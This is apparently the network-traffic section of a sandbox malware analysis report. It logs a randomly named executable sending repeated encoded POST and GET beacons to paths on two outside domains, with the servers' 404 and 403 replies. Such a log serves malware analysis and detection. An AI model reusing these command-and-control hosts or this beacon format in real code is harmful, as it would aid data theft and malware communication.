                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:38.135217905 CEST450INData Raw: d8 aa d8 b1 d8 b3 db 8c 20 d8 a8 d9 87 20 d8 a7 db 8c d9 86 20 d8 b5 d9 81 d8 ad d9 87 20 d9 86 db 8c d8 a7 d8 b2 20 d8 a8 d9 87 26 6e 62 73 70 3b d8 af d8 b3 d8 aa d8 b1 d8 b3 db 8c 20 d9 88 db 8c da 98 d9 87 26 6e 62 73 70 3b d8 a8 d8 a7 d8 b4
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    38192.168.11.204977046.102.130.116801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:40.634516001 CEST716OUTPOST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 34 66 4a 42 38 65 64 55 31 32 30 4a 51 6c 4b 4e 4b 46 78 4d 52 6c 56 61 52 75 78 71 69 6a 48 37 4a 44 45 41 74 57 5a 4c 77 67 67 71 38 55 45 36 4c 61 6e 42 71 4b 32 4e 2f 46 37 67 6e 2f 78 45 57 6b 4c 41 78 79 42 71 62 5a 66 65 2f 47 66 74 58 67 78 45 49 68 6b 4b 63 50 39 57 47 4f 39 63 52 48 52 4b 69 4d 64 4a 73 56 4d 76 4f 44 59 6f 59 77 61 66 4e 57 33 35 4c 70 47 6e 56 4f 65 46 63 62 51 4b 48 74 65 50 45 6c 2f 30 49 38 36 31 36 50 7a 69 75 31 31 2f 70 4e 67 31 48 4d 75 33 58 56 31 54 41 6d 62 48 49 69 67 66 36 6e 65 42 46 6c 39 67 67 2b 6a 69 72 47 34 73 4c 69 79 6c 46 55 63 48 56 54 39 6d 38 51 54 4a 65 4b 4e 57 73 46 66 68 6a 4b 4d 3d
                                                                                                                                                    Data Ascii: PbG=4fJB8edU120JQlKNKFxMRlVaRuxqijH7JDEAtWZLwggq8UE6LanBqK2N/F7gn/xEWkLAxyBqbZfe/GftXgxEIhkKcP9WGO9cRHRKiMdJsVMvODYoYwafNW35LpGnVOeFcbQKHtePEl/0I8616Pziu11/pNg1HMu3XV1TAmbHIigf6neBFl9gg+jirG4sLiylFUcHVT9m8QTJeKNWsFfhjKM=
                                                                                                                                                    Oct 4, 2024 12:00:40.964016914 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=c2amcwrn3nza0amzggyfnv3v; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:40 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:40.964035034 CEST450INData Raw: d8 aa d8 b1 d8 b3 db 8c 20 d8 a8 d9 87 20 d8 a7 db 8c d9 86 20 d8 b5 d9 81 d8 ad d9 87 20 d9 86 db 8c d8 a7 d8 b2 20 d8 a8 d9 87 26 6e 62 73 70 3b d8 af d8 b3 d8 aa d8 b1 d8 b3 db 8c 20 d9 88 db 8c da 98 d9 87 26 6e 62 73 70 3b d8 a8 d8 a7 d8 b4
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    39192.168.11.204977146.102.130.116801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:43.474071026 CEST2578OUTPOST /qlei/ HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.hedieplastic.com
                                                                                                                                                    Referer: http://www.hedieplastic.com/qlei/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 34 66 4a 42 38 65 64 55 31 32 30 4a 51 6c 4b 4e 4b 46 78 4d 52 6c 56 61 52 75 78 71 69 6a 48 37 4a 44 45 41 74 57 5a 4c 77 68 59 71 38 6c 6b 36 4b 35 2f 42 72 4b 32 4e 68 56 37 6a 6e 2f 77 47 57 6b 44 45 78 79 4d 66 62 62 58 65 77 45 48 74 53 52 78 45 54 52 6b 4b 44 2f 39 62 4c 75 38 49 52 48 42 4f 69 4d 4e 4a 73 56 4d 76 4f 41 41 6f 65 6c 6d 66 4c 57 33 36 4d 70 47 72 65 75 65 70 63 62 4a 33 48 74 61 31 45 57 33 30 52 66 53 31 2f 39 62 69 68 31 31 78 71 4e 67 39 48 4d 6a 33 58 56 35 31 41 6c 47 50 49 68 41 66 73 43 6a 61 64 52 4e 50 39 2f 58 35 72 53 73 42 45 41 69 63 48 33 4e 35 53 42 74 50 6a 58 6a 53 63 5a 70 6f 37 67 44 72 30 74 62 37 34 30 32 66 4f 78 73 76 30 45 4f 35 6a 67 45 30 41 36 55 36 6c 63 66 6b 33 6b 59 6d 71 46 56 43 35 48 30 43 68 75 54 7a 78 44 59 71 79 73 4a 53 54 47 52 74 41 6f 4a 63 6e 50 41 48 4c 4d 59 68 6d 73 4f 44 75 54 37 64 4a 2b 66 76 38 76 41 51 41 71 51 42 4d 67 49 35 30 41 54 66 42 43 49 63 69 48 6c 64 6d 4b 37 48 4f 33 4a 6c 57 39 6f 66 74 62 4f 75 4b 4a [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=4fJB8edU120JQlKNKFxMRlVaRuxqijH7JDEAtWZLwhYq8lk6K5/BrK2NhV7jn/wGWkDExyMfbbXewEHtSRxETRkKD/9bLu8IRHBOiMNJsVMvOAAoelmfLW36MpGreuepcbJ3Hta1EW30RfS1/9bih11xqNg9HMj3XV51AlGPIhAfsCjadRNP9/X5rSsBEAicH3N5SBtPjXjScZpo7gDr0tb7402fOxsv0EO5jgE0A6U6lcfk3kYmqFVC5H0ChuTzxDYqysJSTGRtAoJcnPAHLMYhmsODuT7dJ+fv8vAQAqQBMgI50ATfBCIciHldmK7HO3JlW9oftbOuKJm7/WBbnN74TukkvuxHpwLGXQS648RJ7uOVrUbUGhl/zgwmNnPRmBJgtcPJ924WvlsgEfr4eTqz2LfrvgjKX55Y/fAVqXINfTQstfTGcCmd2+YzGJ2w0QByPxtnuW2g/gs4lrLR7el0if/+FlckbJtUJHQycqz/1Ggi2gk1/WBdWFJn5Lr9XQfQZIyIhKJWN1IT1rBJBFe3X3FV/PxnqF4QLFGRO3MqmVOLjA7a5R3gUn4fzeq6mHG58E+STBSFvOBrrvPOJG9cCBWF2PyqGatrLuncUczsydVqiau4ouewPMDSZKVRrOdKeglTWPplQzwnuIsWQ5OsUGCpGuwVmvo3HcvR4Qf0iNptKwwtVN34JfbJ0uVO1ZI+r53G21Z+X3akryYsvzusS3SSw2tJkaghPv3LE3k63zGQPQMextdGzRz4qLGv+TLCOXarR1pmTv6D5OMsQ7y2zTTXT96RvUQNL3VWof8iLyzUtxjX0qBNBUkx5sKblzqssZB0PCzAhIbaF8tcB0FjRN0/Nklb34wVdZJUVTdOYv7Lz/mPY4kseVAslwvI04ITGOf4Xolv/Dy3X5x8w80/OS9O4LOM1pBuJEi2Uc316rSf+1ZY3VZvCUjydbr1WoVf2pSTJii2YK/A9bifJGcUp7TpOMsZIeEPhC597lrLMrIb [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:43.474106073 CEST4343OUTData Raw: 63 55 32 2b 67 65 35 2b 2b 53 67 67 53 44 35 58 2f 33 63 6f 49 79 6a 75 74 62 78 4a 69 75 62 56 6a 75 35 34 4c 6d 6b 52 53 4e 58 7a 4f 43 48 73 4a 57 7a 48 77 66 31 52 73 77 76 34 63 33 78 51 4b 4b 43 6e 30 58 43 79 39 31 71 61 47 6d 6a 65 63 74
                                                                                                                                                    Data Ascii: cU2+ge5++SggSD5X/3coIyjutbxJiubVju54LmkRSNXzOCHsJWzHwf1Rswv4c3xQKKCn0XCy91qaGmjectxOmLNiyTGTw4JJKB+keQZfp76Fj7jSzAnxUEfplj0xsRxJvAA7NaNsSEyeBxb1mZl/AJjT/Zk96XiaQd0+2yBHe9DuD2CF2VsDO9NPcVGnXO0g3H9b1ZHNwkcBpRoJAfpndqXGqANERQpgC0c+rlMjoztj6ZNqpdb
                                                                                                                                                    Oct 4, 2024 12:00:43.805389881 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=df3g3dyd3cnzyo4re1j1ozuc; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:43 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:43.805404902 CEST450INData Raw: d8 aa d8 b1 d8 b3 db 8c 20 d8 a8 d9 87 20 d8 a7 db 8c d9 86 20 d8 b5 d9 81 d8 ad d9 87 20 d9 86 db 8c d8 a7 d8 b2 20 d8 a8 d9 87 26 6e 62 73 70 3b d8 af d8 b3 d8 aa d8 b1 d8 b3 db 8c 20 d9 88 db 8c da 98 d9 87 26 6e 62 73 70 3b d8 a8 d8 a7 d8 b4
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    40192.168.11.204977246.102.130.116801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:46.317574978 CEST430OUTGET /qlei/?PbG=1dhh/rR2+Ao8cSiudW9CEG89SOA5iCCmNAl/rU9Fzwpz0XQlGI+SqOP59XCH8flBSUq99zsbRoSQkEbtVQJkQy88E/1gHIIJW2hLrfVypywFJgwBZQbuFEw=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.hedieplastic.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:00:46.653053045 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Cache-Control: private,public
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Set-Cookie: ASP.NET_SessionId=yjxzm0xtgg2mwcbx4vmy3tlz; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:46 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1476
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head id="Head1"><title> </title><meta name="description" content="404 - Not Found" /><meta name="keywords" content=",,,,,,404 - Not Found" /></head><body> <link href="/Users/Pages/71.css" rel="stylesheet" type="text/css"/><div><div dir="ltr" class="_71_0">&nbsp;</div><h1 dir="ltr" class="_71_0"><span class="_71_2"><span class="_71_3"><strong>Oops!!! 404 - Not Found</strong></span></span></h1><div>&nbsp;</div><div class="_71_0"><span class="_71_5"><span class="_71_6">&nbsp; . <br /><br /> . <br /><br /> &nbsp; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:00:46.653069019 CEST450INData Raw: d8 aa d8 b1 d8 b3 db 8c 20 d8 a8 d9 87 20 d8 a7 db 8c d9 86 20 d8 b5 d9 81 d8 ad d9 87 20 d9 86 db 8c d8 a7 d8 b2 20 d8 a8 d9 87 26 6e 62 73 70 3b d8 af d8 b3 d8 aa d8 b1 d8 b3 db 8c 20 d9 88 db 8c da 98 d9 87 26 6e 62 73 70 3b d8 a8 d8 a7 d8 b4
                                                                                                                                                    Data Ascii: &nbsp; &nbsp;<br /><br /> <br /><br />


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    41192.168.11.204977391.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:08.367368937 CEST690OUTPOST /w8xy/ HTTP/1.1
                                                                                                                                                    Host: www.gipsytroya.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.gipsytroya.com
                                                                                                                                                    Referer: http://www.gipsytroya.com/w8xy/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 73 6b 5a 59 4a 30 59 53 54 70 52 63 6f 48 6d 47 75 56 43 74 72 38 30 32 75 56 6c 2b 71 65 4a 32 72 77 74 73 67 6e 56 68 38 48 61 71 54 51 73 6b 35 68 34 76 51 6a 64 6f 79 36 42 41 57 63 6a 38 34 75 35 37 42 6b 39 7a 54 34 79 71 5a 75 70 59 72 56 72 46 6f 63 46 41 4c 79 77 72 7a 43 6c 78 72 4b 2b 45 50 6f 64 34 46 63 33 76 51 78 77 58 64 62 62 62 39 73 42 41 66 6e 6f 4f 4f 37 4b 51 31 42 77 34 47 74 78 67 30 2f 76 7a 6e 74 41 64 47 2f 66 4c 68 68 75 31 38 48 58 6f 52 4e 6e 2b 32 39 63 38 38 6c 6d 62 6b 37 51 62 41 4d 76 68 4f 6b 36 61 74 54 44 4d 53 71 32 30 61 31 52 55 77 3d 3d
                                                                                                                                                    Data Ascii: PbG=wskZYJ0YSTpRcoHmGuVCtr802uVl+qeJ2rwtsgnVh8HaqTQsk5h4vQjdoy6BAWcj84u57Bk9zT4yqZupYrVrFocFALywrzClxrK+EPod4Fc3vQxwXdbbb9sBAfnoOO7KQ1Bw4Gtxg0/vzntAdG/fLhhu18HXoRNn+29c88lmbk7QbAMvhOk6atTDMSq20a1RUw==
                                                                                                                                                    Oct 4, 2024 12:01:08.549079895 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    42192.168.11.204977491.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:11.071880102 CEST710OUTPOST /w8xy/ HTTP/1.1
                                                                                                                                                    Host: www.gipsytroya.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.gipsytroya.com
                                                                                                                                                    Referer: http://www.gipsytroya.com/w8xy/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 73 6b 5a 59 4a 30 59 53 54 70 52 63 4d 37 6d 45 4e 39 43 36 62 38 31 7a 75 56 6c 78 4b 65 46 32 72 38 74 73 6c 57 51 68 4f 54 61 71 7a 67 73 32 4c 4a 34 75 51 6a 64 38 43 36 45 66 6d 63 73 38 34 6a 45 37 46 6b 39 7a 54 38 79 71 64 69 70 59 63 42 73 66 59 63 48 49 72 79 75 76 7a 43 6c 78 72 4b 2b 45 4c 35 36 34 42 77 33 76 6c 35 77 57 34 33 59 52 64 73 43 48 66 6e 6f 46 75 37 4f 51 31 42 57 34 48 67 35 67 33 48 76 7a 69 52 41 64 58 2f 65 43 68 67 6e 71 73 47 6b 6d 42 4d 7a 2f 54 68 4c 33 64 46 76 54 56 6e 4b 58 32 64 31 38 38 51 65 5a 2b 50 78 49 69 54 65 32 59 30 4b 4a 33 37 64 36 45 6b 46 30 75 79 2b 48 37 6d 56 37 41 79 63 67 63 63 3d
                                                                                                                                                    Data Ascii: PbG=wskZYJ0YSTpRcM7mEN9C6b81zuVlxKeF2r8tslWQhOTaqzgs2LJ4uQjd8C6Efmcs84jE7Fk9zT8yqdipYcBsfYcHIryuvzClxrK+EL564Bw3vl5wW43YRdsCHfnoFu7OQ1BW4Hg5g3HvziRAdX/eChgnqsGkmBMz/ThL3dFvTVnKX2d188QeZ+PxIiTe2Y0KJ37d6EkF0uy+H7mV7Aycgcc=
                                                                                                                                                    Oct 4, 2024 12:01:11.253637075 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    43192.168.11.204977591.195.240.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:01:13.775104046 CEST2578OUTPOST /w8xy/ HTTP/1.1
                                                                                                                                                    Host: www.gipsytroya.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.gipsytroya.com
                                                                                                                                                    Referer: http://www.gipsytroya.com/w8xy/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
